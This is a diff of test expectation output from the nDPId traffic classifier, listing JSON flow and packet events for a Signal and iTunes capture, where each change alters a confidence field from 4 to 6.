00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569051264088,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1569051264088,"pkt":"xiwDYGpkxGGLNYKpCABFAABTylIAAP8Ra+TAqAIRwKgCAdvHADUAPyTGAMEBAAABAAAAAAAAEnRleHRzZWN1cmUtc2VydmljZQ53aGlzcGVyc3lzdGVtcwNvcmcAAAEAAQ=="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264088,"flow_last_seen":1569051264088,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569051264088,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"},"dns": {"query":"textsecure-service.whispersystems.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264088,"flow_last_seen":1569051264088,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569051264088,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"},"dns": {"query":"textsecure-service.whispersystems.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264090,"flow_last_seen":1569051264090,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264090,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569051264090,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264090,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN6\/Abvpz5RJAAAAALAC\/\/80LQAAAgQFtAEDAwcBAQgKKFWSWgAAAAAEAgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264091,"flow_last_seen":1569051264091,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264091,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -69,71 +69,71 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569051264093,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264093,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7BAbuYIIuMAAAAALAC\/\/+OlgAAAgQFtAEDAwcBAQgKKFWSWwAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569051264113,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264113,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADQGlLoXORgQwKgCEQG73r7gO6oYx92viqAScSBHlgAAAgQFrAQCCAqWTmoXKFWSTQEDAwc="} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569051264113,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":193,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":193,"pkt_l4_len":159,"thread_ts_msec":1569051264113,"pkt":"xGGLNYKpxiwDYGpkCABFAACz4rsAAEAREhzAqAIBwKgCEQA128cAn9JUAMGBgAABAAYAAAAAEnRleHRzZWN1cmUtc2VydmljZQ53aGlzcGVyc3lzdGVtcwNvcmcAAAEAAcAMAAEAAQAAAB0ABDavL27ADAABAAEAAAAdAAQi4fCtwAwAAQABAAAAHQAEaxdHWcAMAAEAAQAAAB0ABCOpAyjADAABAAEAAAAdAAQ0zyk7wAwAAQABAAAAHQAENMjD8Q=="} -00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569051264088,"flow_last_seen":1569051264113,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1569051264113,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"},"dns": {"query":"textsecure-service.whispersystems.org","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.175.47.110"}} +00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569051264088,"flow_last_seen":1569051264113,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1569051264113,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"},"dns": {"query":"textsecure-service.whispersystems.org","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.175.47.110"}} 00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569051264115,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1569051264115,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569051264115,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4YPoAAEABlGjAqAIRwKgCAQMDIGEAAAAARQAAs+K7AABAERIcwKgCAcCoAhEANdvHAJ8AAA=="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569051264115,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.664498} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569051264115,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.664498} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1569051264116,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264116,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGSMLAqAIRFzkYEN6+AbvH3a+K4DuqGYAQBAvjSwAAAQEICihVknGWTmoX"} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264078,"flow_last_seen":1569051264116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264078,"flow_last_seen":1569051264151,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264151,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264078,"flow_last_seen":1569051264116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264078,"flow_last_seen":1569051264151,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264151,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1569051264185,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264185,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG7wEvNn9QhBdFlyaASaN\/LpgAAAgQFrAQCCApkFUBJKFWN0AEDAwg="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1569051264186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264186,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKMBLAbsF0WXJzZ\/UIoAQCBZawQAAAQEICihVjkRkFUBJ"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569051264198,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264198,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73r+o1iHY6c+USqASaN9tOAAAAgQFrAQCCApkFUBMKFWSWgEDAwg="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569051264203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264203,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sBFykuNjtdEXqASaN9RcQAAAgQFrAQCCApkFUBNKFWSWwEDAwg="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569051264203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264203,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sEV2c5FmCCLjaASaN+uMAAAAgQFrAQCCApkFUBNKFWSWwEDAwg="} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264073,"flow_last_seen":1569051264229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1569051264229,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264073,"flow_last_seen":1569051264229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1569051264229,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN6\/Abvpz5RKqNYh2YAQBAsAMQAAAQEICihVkvtkFUBM"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264090,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264090,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7AAbuO10ReRcpLjoAQBAvkagAAAQEICihVkvtkFUBN"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264091,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264091,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264259,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7BAbuYIIuNFdnORoAQBAtBKQAAAQEICihVkvxkFUBN"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264093,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264073,"flow_last_seen":1569051264342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1569051264342,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01421{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":229,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264073,"flow_last_seen":1569051264343,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1569051264343,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 